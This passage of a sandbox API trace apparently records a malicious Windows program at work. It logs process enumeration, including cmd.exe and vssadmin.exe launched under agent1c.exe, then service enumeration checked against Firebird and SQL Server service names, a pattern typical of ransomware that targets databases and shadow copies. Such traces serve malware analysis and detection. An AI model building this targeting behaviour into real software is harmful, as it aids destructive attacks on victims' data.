lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0035.416] lstrlenW (lpString="svchost.exe") returned 11 [0035.416] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0035.416] lstrlenW (lpString="svchost.exe") returned 11 [0035.416] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0035.417] lstrlenW (lpString="dwm.exe") returned 7 [0035.417] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0035.418] lstrlenW (lpString="explorer.exe") returned 12 [0035.418] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0035.418] lstrlenW (lpString="spoolsv.exe") returned 11 [0035.418] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0035.419] lstrlenW (lpString="taskhost.exe") returned 12 [0035.419] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0035.420] lstrlenW (lpString="svchost.exe") returned 11 [0035.420] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0035.420] lstrlenW (lpString="taskeng.exe") returned 11 [0035.420] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0035.421] lstrlenW (lpString="taskhost.exe") returned 12 [0035.421] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x59c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="entrepreneur.exe")) returned 1 [0035.422] lstrlenW (lpString="entrepreneur.exe") returned 16 [0035.422] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="andrew kinds.exe")) returned 1 [0035.422] lstrlenW (lpString="andrew kinds.exe") returned 16 [0035.422] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="baskets-gazette-arm.exe")) returned 1 [0035.423] lstrlenW (lpString="baskets-gazette-arm.exe") returned 23 [0035.423] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="educated.exe")) returned 1 [0035.424] lstrlenW (lpString="educated.exe") returned 12 [0035.424] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="servers.exe")) returned 1 [0035.424] lstrlenW (lpString="servers.exe") returned 11 [0035.424] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gibson-necessary.exe")) returned 1 [0035.425] lstrlenW (lpString="gibson-necessary.exe") returned 20 [0035.425] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x328, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gbp_chair.exe")) returned 1 [0035.551] lstrlenW (lpString="gbp_chair.exe") returned 13 [0035.551] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="attention infected.exe")) returned 1 [0035.552] lstrlenW (lpString="attention infected.exe") returned 22 [0035.552] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="have-oz-barrel.exe")) returned 1 [0035.552] lstrlenW (lpString="have-oz-barrel.exe") returned 18 [0035.552] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pattern amateur.exe")) returned 1 [0035.553] lstrlenW (lpString="pattern amateur.exe") returned 19 [0035.553] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="referral.exe")) returned 1 [0035.554] lstrlenW (lpString="referral.exe") returned 12 [0035.554] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="copyingseems.exe")) returned 1 [0035.554] lstrlenW (lpString="copyingseems.exe") returned 16 [0035.554] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spin generally.exe")) returned 1 [0035.555] lstrlenW (lpString="spin generally.exe") returned 18 [0035.555] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="television consolidated wav.exe")) returned 1 [0035.556] lstrlenW (lpString="television consolidated wav.exe") returned 31 [0035.556] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="transmit.exe")) returned 1 [0035.557] lstrlenW (lpString="transmit.exe") returned 12 [0035.557] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="travel-fits-insights.exe")) returned 1 [0035.557] lstrlenW (lpString="travel-fits-insights.exe") returned 24 [0035.557] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="discipline-netherlands-sail.exe")) returned 1 [0035.558] lstrlenW (lpString="discipline-netherlands-sail.exe") returned 31 [0035.558] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x408, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fed_loved_statute.exe")) returned 1 [0035.559] lstrlenW (lpString="fed_loved_statute.exe") returned 21 [0035.559] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="trial_stadium_tr.exe")) returned 1 [0035.559] lstrlenW (lpString="trial_stadium_tr.exe") returned 20 [0035.559] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="delight.exe")) returned 1 [0035.560] lstrlenW (lpString="delight.exe") returned 11 [0035.560] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="within enquiry.exe")) returned 1 [0035.561] lstrlenW (lpString="within enquiry.exe") returned 18 [0035.561] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x80c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0035.562] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0035.562] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0035.562] lstrlenW (lpString="dllhost.exe") returned 11 [0035.562] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0035.563] lstrlenW (lpString="dllhost.exe") returned 11 [0035.563] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="agent1c.exe")) returned 1 [0035.564] lstrlenW (lpString="agent1c.exe") returned 11 [0035.564] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0035.564] lstrlenW (lpString="cmd.exe") returned 7 [0035.564] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0035.565] lstrlenW (lpString="conhost.exe") returned 11 [0035.565] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xa84, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0035.566] lstrlenW (lpString="vssadmin.exe") returned 12 [0035.566] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xa84, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 0 [0035.567] CloseHandle (hObject=0x1b8) returned 1 [0035.567] Sleep (dwMilliseconds=0x1f4) [0036.274] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x3720560 [0036.275] EnumServicesStatusExW (in: hSCManager=0x3720560, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x21dff44, lpServicesReturned=0x21dff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x21dff44, lpServicesReturned=0x21dff5c, lpResumeHandle=0x0) returned 0 [0036.275] GetLastError () returned 0xea [0036.275] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x123e) returned 0x63e060 [0036.275] EnumServicesStatusExW (in: hSCManager=0x3720560, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x63e060, cbBufSize=0x123e, pcbBytesNeeded=0x21dff44, lpServicesReturned=0x21dff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x63e060, pcbBytesNeeded=0x21dff44, lpServicesReturned=0x21dff5c, lpResumeHandle=0x0) returned 1 [0036.276] CloseServiceHandle (hSCObject=0x3720560) returned 1 [0036.276] lstrlenW (lpString="Appinfo") returned 7 [0036.276] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0036.276] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0036.276] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0036.276] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0036.276] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0036.276] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0036.276] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0036.276] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0036.276] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0036.276] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0036.276] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0036.276] lstrlenW (lpString="AudioSrv") returned 8 [0036.276] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0036.276] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0036.276] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0036.276] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0036.276] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0036.276] lstrlenW (lpString="BFE") returned 3 [0036.277] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0036.277] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0036.277] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0036.277] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0036.277] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0036.277] lstrlenW (lpString="CryptSvc") returned 8 [0036.277] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0036.277] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0036.277] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0036.277] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0036.277] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0036.277] lstrlenW (lpString="CscService") returned 10 [0036.277] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0036.277] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0036.277] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0036.277] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0036.277] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0036.277] lstrlenW (lpString="DcomLaunch") returned 10 [0036.277] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0036.277] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0036.277] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0036.277] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0036.277] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0036.277] lstrlenW (lpString="Dhcp") returned 4 [0036.277] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0036.277] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0036.277] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0036.277] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0036.277] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0036.277] lstrlenW (lpString="Dnscache") returned 8 [0036.277] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0036.277] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0036.277] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0036.277] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0036.277] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0036.278] lstrlenW (lpString="DPS") returned 3 [0036.278] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0036.278] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0036.278] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0036.278] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0036.278] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0036.278] lstrlenW (lpString="eventlog") returned 8 [0036.278] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0036.278] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0036.278] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0036.278] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0036.278] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0036.278] lstrlenW (lpString="EventSystem") returned 11 [0036.278] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0036.278] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0036.278] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0036.278] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0036.278] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0036.278] lstrlenW (lpString="gpsvc") returned 5 [0036.278] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0036.278] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0036.278] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0036.278] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0036.278] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0036.278] lstrlenW (lpString="iphlpsvc") returned 8 [0036.278] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0036.278] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0036.278] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0036.278] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0036.278] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0036.278] lstrlenW (lpString="LanmanServer") returned 12 [0036.278] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0036.278] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0036.278] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0036.278] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0036.279] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0036.279] lstrlenW (lpString="LanmanWorkstation") returned 17 [0036.279] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0036.279] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0036.279] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0036.279] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0036.279] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0036.279] lstrlenW (lpString="lmhosts") returned 7 [0036.279] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0036.279] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0036.279] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0036.279] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0036.279] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0036.279] lstrlenW (lpString="MMCSS") returned 5 [0036.279] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0036.279] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0036.279] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0036.279] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0036.279] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0036.279] lstrlenW (lpString="MpsSvc") returned 6 [0036.279] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0036.279] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0036.279] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0036.279] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0036.279] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0036.279] lstrlenW (lpString="Netman") returned 6 [0036.279] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0036.279] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0036.279] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0036.279] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0036.279] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0036.279] lstrlenW (lpString="netprofm") returned 8 [0036.279] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0036.280] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0036.280] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0036.280] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0036.280] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0036.280] lstrlenW (lpString="NlaSvc") returned 6 [0036.280] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0036.280] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0036.280] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0036.280] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0036.280] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0036.280] lstrlenW (lpString="nsi") returned 3 [0036.280] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0036.280] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0036.280] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0036.280] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0036.280] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0036.280] lstrlenW (lpString="PcaSvc") returned 6 [0036.280] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0036.280] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0036.280] lstrcmpiW (lpString1="sqlwriter", 